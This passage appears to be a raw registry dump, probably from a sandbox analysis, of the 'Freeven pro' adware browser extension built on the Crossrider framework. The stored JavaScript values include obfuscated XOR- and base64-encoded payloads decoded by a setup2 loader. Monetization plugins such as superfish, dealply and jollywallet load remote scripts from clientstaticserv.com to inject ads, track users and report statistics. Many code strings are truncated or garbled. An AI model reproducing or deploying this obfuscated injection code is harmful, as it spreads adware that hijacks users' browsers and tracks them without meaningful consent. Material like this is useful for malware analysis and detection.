TgxZTFkMTExZDNmMDcxYzBjNGIyODI1MmIyMDI2MjIzNTIzMjAzMjMyMjgzNzMzMzkyMTM5M2YyODNiMzI5"
[HKCU\Software\Freeven pro\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"
[HKCU\Software\Freeven pro\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWM3MzY3NGExYTAwMDUwMTNiMDEwYjViNTQ0ODUwMWMwNTA1MWU0OTQ4NTYwYjEwMDY0NTVmMTQwMDE0MDYxZTBiMTExMzVhMTIxZTAzNWMxMDEwMGEwZjE3MDA1ZTE4MDAxOTAyMWExYTM3MDEwNDEwMDMwNTVjMGUxNzA0MzcwMTA0MDMxYTMxMDAxMzE4MWMxYzE3MDY1ZjFiMWQ0YzE3MTAwYTU1M2UyMDM0MDIyMTM3MjY0ODIxMmMyMzA3M2MxYjA5NDAyYTEzMjcxYjNjMzAxMjQ1MjEyNzI2NWM1ZDJjNTQwNzA0MTMwNzE3NWEyNjMxMmIyMDNiMjIyMjNjM2EyMzNjM2MzNzIxMjEzMzJlMjczNzM4MjY0YzQ0Nzg3ZDUzMDEwMjA2MDAxMDAwMjExNjU2NGI1MTVjNDc1MzczMTM=', 'gynhrtqqns'); }"
[HKCU\Software\Freeven pro\Installer]
"subid" = "0"
[HKCU\Software\Freeven pro\Plugins\102]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\28]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\246]
"Name" = "setup"
[HKCU\Software\Freeven pro\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\Freeven pro\Installer]
"DefaultBrowser" = "ie"
"FullVersionForUrl" = "1_34_05_04"
[HKCU\Software\Freeven pro\Plugins\103]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/intext_5_m.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Freeven pro\Manifest]
"ThanksUrl" = "NA"
"PublisherId" = "21636"
[HKCU\Software\Freeven pro\Plugins\1]
"Name" = "base"
[HKCU\Software\Freeven pro\Plugins\246]
"JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDERÇÂÂ5"
[HKCU\Software\Freeven pro\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\Freeven pro\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\Freeven pro\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA5"
[HKCU\Software\Freeven pro\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\Freeven pro\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ZDZhNDYwMDBkMWUwYTNhMTcwMzQ1NTk0NDRhMTExZTBlMWY1ZjQwNDgxNDEzMWY1NzE5MGYxZjAwMWQwMTBhMTcwMDU3MDkxNTAyNGExODE0NGMxNzBlMjYwNzFiMDYwYjQxMGQxMDE0NTcxZDA2MDkwMDEwMWQwNDA2NTkwMDExMWMwMDAyMGMwNDEwNDUxMTFiMWMxODMzMGI1ODBlMDUwMDQyMmIyZDIzM2U1MjNhMzAyNDMxMmIzYjJhMzgzMzJiMjAzZDM4MzAzMTJhMjYyMzNlMzAzYTRkNGI2OTZkNGExMTFlMGUxZjE2M2ExNTBmNDY1MjU5NDgxMjFiMTExZjE0NTk0YjQ3MGUxZDBkNDExNjFhMTcwNjE2MGUxMDE5MTI0MTA2MDAwYTRjMTMxYjU2MTkxYzMwMDgwZTBlMGQ0YTAyMGExYTQ1MGIwOTFjMDgxNjE2MGIxYzU3MTIwNzEzMTUwYTBhMGYxZjVmMWYwOTBhMTcyNjAzNWUwNTBhMWE0YzM5M2IyYzJiNWEzYzNiMmIyYjI1MjkzYzM3MjYyMzI2MzYzNzJhM2YzODMwMmMyYjM4M2M0NjQ0NzM2MzU4MWYwOTFhMDAwYTBhMjExZDQ4NDA0ZjVjNWM0YjY5NDQ0ODU5NGE1ODE5MDAxZDEzMGEwNzA5MTU0ODQwNGYzZTRkMTQwYjBiMTgwOTAzMTQwODQ3MzI2ZDFl', 'ogcdhyjzoe'); }"
[HKCU\Software\Freeven pro\Plugins\22]
"Name" = "resources"
[HKCU\Software\Freeven pro\Plugins\72]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\Freeven pro\Plugins\1]
"JavaScript" = "appAPI._cr_config={appID:function(){var a=appAPI.appInfo;if(a){return appAPI.appInfo.id;}else{return appAPI.appID;}}};$jquery.extend(appAPI._cr_config,{sidebar:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/sidebar.css,themes:/plugins/images/sidebar}});$jquery.extend(appAPI._cr_config,{notifications_manager:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},statsBase:{production:http://nstats.crossrider.com,staging:http://staging-app.crossrider.com},geolocation:http://www.geoplugin.net/json.gp?jsoncallback=fn,meta:/notifier/ appAPI._cr_config.appID() /meta.json,messages:/notifier/ appAPI._cr_config.appID() /{id}.json,logger:/notifications.gif,loggerAPI:/api_notifications.gif},notifications:{base:{production:https://w9u6a2p6.ssl.hwcdn.net,staging:http://staging-app.crossrider.com},css:/plugins/stylesheets/notifications.css,themes:/plugins/images/notifications}});a5"
[HKCU\Software\Freeven pro\Plugins\44]
"Name" = "IEMisc"
[HKCU\Software\Freeven pro\Plugins\183]
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\2]
"Version" = "2"
[HKCU\Software\Freeven pro\Manifest]
"ModeType" = "production"
[HKCU\Software\Freeven pro\Plugins\35]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\Freeven pro\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferUrl" = "NA"
[HKCU\Software\Freeven pro\Update]
"LastCheck" = "1427668149"
[HKCU\Software\Freeven pro\Plugins\177]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\41]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Freeven pro\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){5"
[HKCU\Software\Freeven pro\Plugins\46]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\91]
"JavaScript" = "(function(i){var l=05-04;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var t=appAPI.utils.MD5;if(!t||!t.encode){t={};t.encode=function(H){return H;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var C=appAPI.utils;var F={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.clientstaticserv.com/monetization_campaigns/,statsHostUrl:http://logs.clientstaticserv.com/monetization.gif?,errorHostUrl:http://errors.clientstaticserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefu5"
[HKCU\Software\Freeven pro\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtts5"
[HKCU\Software\Freeven pro\Manifest]
"PluginsManifestVersion" = "17"
[HKCU\Software\Freeven pro\Plugins\184]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\37]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"
[HKCU\Software\Freeven pro\Plugins\72]
"JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=p5"
[HKCU\Software\Freeven pro\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\Freeven pro\Plugins\42]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInternal.js"
[HKCU\Software\Freeven pro\Plugins\38]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"
[HKCU\Software\Freeven pro\Plugins\43]
"Name" = "IEMessaging"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Freeven pro\Plugins\22]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources.js"
[HKCU\Software\Freeven pro\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Freeven pro\Plugins\35]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"
[HKCU\Software\Freeven pro\Manifest]
"SetNewTab" = "false"
[HKCU\Software\Freeven pro\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac15"
[HKCU\Software\Freeven pro\Manifest]
"Name" = "Freeven pro"
[HKCU\Software\Freeven pro\Plugins\94]
"Version" = "2"
[HKCU\Software\Freeven pro\Plugins\246]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\3]
"Version" = "2"
"Name" = "ie8_fix_2"
[HKCU\Software\Freeven pro\Plugins\184]
"Name" = "noproblemppc_m"
[HKCU\Software\Freeven pro\Plugins\13]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderAppUtils.js"
[HKLM\SOFTWARE\Freeven pro\IE]
"TotalProfiles" = "1"
[HKCU\Software\Freeven pro\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Freeven pro\Plugins\43]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMessaging.js"
[HKCU\Software\Freeven pro\Plugins\38]
"Version" = "4"
[HKCU\Software\Freeven pro\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\Freeven pro\Plugins\44]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEMisc.js"
[HKCU\Software\Freeven pro\Code]
"NewTabJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\Freeven pro\Installer]
"Time" = "1427668122"
[HKCU\Software\Freeven pro\Plugins\93]
"Version" = "9"
[HKCU\Software\Freeven pro\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b5"
[HKCU\Software\Freeven pro\Plugins\45]
"Name" = "IEOnRequest"
[HKCU\Software\Freeven pro\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE2NTY4NGIxMTBkMWIwMzNkMDMwNjRkNWI0OTViMTExYjA3MTg0YjQ1NDAwMjBkMTc1NzE5MWExYjEwMGUwYjRmMGExNjE0NDAwMDBiMDMwMzFmMTU0NjQ4NGQ1YTQ1NWY0NjU4NWE1NjVmNGM1NjFmMDEwZDFkMDUwZTA1NDcxMzBhNTAwMDFkMTMwMzBiNWMzNjI2M2EzZDNjM2IyMjM4MjYyNTJjMmIyNjNjMjYyYTJlMjMyYjNlMzY1YjU1NjU3YTRhMDEwNjFhMDYwMDE3MzAwYjUxNTI1MTU4NWQ1MjQ1NzM1OTRmNTM0ODUzMWMwYTEzMWQxMDFhMGUxZjRhNGI0YTM0NDMxYTExMTYxZjAzMDExZjBkNGQzYzYzMDQ=', 'joaiyyoshq'); }"
[HKCU\Software\Freeven pro\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\Freeven pro\Plugins\104]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke15"
[HKCU\Software\Freeven pro\Code]
"AppJavaScript" = ""
[HKCU\Software\Freeven pro\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Freeven pro\Plugins\28]
"Name" = "initializer"
[HKCU\Software\Freeven pro\Plugins\43]
"Version" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Freeven pro\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\Freeven pro\Plugins\64]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiMessage.js"
[HKCU\Software\Freeven pro\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU3YTVhNDM0ODUxNGQwYTFjMDAxNTI1MDgwZjRhNGI0ZjQwMDAwMDExMDA0MDRjNDcxODQxMDExYTEwMTcxYTA5NGQwMTFmMDkwZDQ3MTcxNzE0MDg0YzAyMTAxOTAzMWIxNzE3MTkwYTE3NDYxYjFjNWQwYjFjMDQxZTE0MDYwNDRjMGMxMDBjMDYzYTJmMjUyMDNhM2UzYzMxM2EzZDIxMzUyODNjM2IyNDJkM2QyMTMwM2EyZjVjMDIxODAxM2IwYjFjMTgwMDRkMjUzYzJiMjMyMDMxM2IyNjJjMzQzZjMxMzczMDNmMzIzNzNhMjQzZDNmM2MzNzU3MDcwYjBjNDkzYTJmMzkzMTI3MjIzYzMwMjEzMDIwMjIyNTM2M2IzNDNkM2QyMTMwM2EyZjU4NGY2MjUxNGY0MjQ4NTYwZDA0MGUxMzFiMjQxZDBlNGE0ZTQ1NTIxMjE3MWMwMTFjNTg0NzViMGMyZjE5MTEwYzAzMDUxMTM3MWQwYjE2MTU0ZDFjMWQxYzAxMGMxYTRiMTMxNTBlNDcxMjFkMDYxYTViMGYxMTBjMDIxYjEyMWQwYjE4MDA0YjFhMDk1YzBiMTkwZTBjMDYxMTA5NGQxOTExMGMwMzMwM2QzNzM3MzczZjI5MzAzYTM4MmIyNzNhMmIzNjI1MzgzYzIxMzUzMDNkNGUxNTE1MDAyZTBhMWMxZDBhNWYzNzJiMjYyMjM1MzAzYjIzMjYyNjJkMjYzYTMxMmEzMzM3M2YyZTJmMmQyYjNhNTYxMjBhMGM0YzMwM2QyYjI2MmEyMzI5MzEyMTM1MmEzMDM3MjEzNjM1MjgzYzIxMzUzMDNkNGE1ODZmNTA1YTQzNDg1MzFmMGUxZDEzMGMxZTMzMDc0YTRiNGY1MzU4NDY0OTdhNWE0MzQ4NTE0ZDE0MGQwNjExMTkxOTAyMDQ1MzU1NDIzMzU2MTYxODE1MTMxODE4MDE05"
[HKCU\Software\Freeven pro\Plugins\2]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_1.js"
[HKCU\Software\Freeven pro\Plugins\223]
"Name" = "imonomy_m"
[HKCU\Software\Freeven pro\Plugins\39]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEDatabase.js"
[HKCU\Software\Freeven pro\Plugins\44]
"Version" = "6"
[HKCU\Software\Freeven pro\Plugins\223]
"Version" = "5"
[HKCU\Software\Freeven pro\Plugins\184]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/noproblemppc_m.js"
[HKCU\Software\Freeven pro\Plugins\72]
"Name" = "appApiValidation"
[HKCU\Software\Freeven pro\Plugins\103]
"Name" = "intext_5_m"
[HKCU\Software\Freeven pro\Plugins\223]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/imonomy_m.js"
[HKCU\Software\Freeven pro\Plugins\104]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"
[HKCU\Software\Freeven pro\Plugins\93]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js"
[HKCU\Software\Freeven pro\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Freeven pro\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO5"
[HKCU\Software\Crossrider]
"Bic" = "11992E1999324ACFB8E0C19B718E3265IE"
[HKCU\Software\Freeven pro\Plugins\17]
"URL" = "http://js.clientstaticserv.com/plugins/mins/jQuery.js"
[HKCU\Software\Freeven pro\Plugins\3]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"
[HKCU\Software\Freeven pro\Manifest]
"DisableIe" = "true"
[HKCU\Software\Freeven pro\Plugins\21]
"URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"
[HKCU\Software\Freeven pro\Installer]
"CodeDownloadDomain" = "http://js.clientstaticserv.com"
[HKCU\Software\Freeven pro\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Freeven pro\Plugins\242]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"
"Version" = "3"
[HKCU\Software\Freeven pro\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Freeven pro\Plugins\182]
"URL" = "http://js.clientstaticserv.com/plugins/mins/openUrl.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Freeven pro\Plugins\40]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEExtension.js"
[HKCU\Software\Freeven pro\Plugins\182]
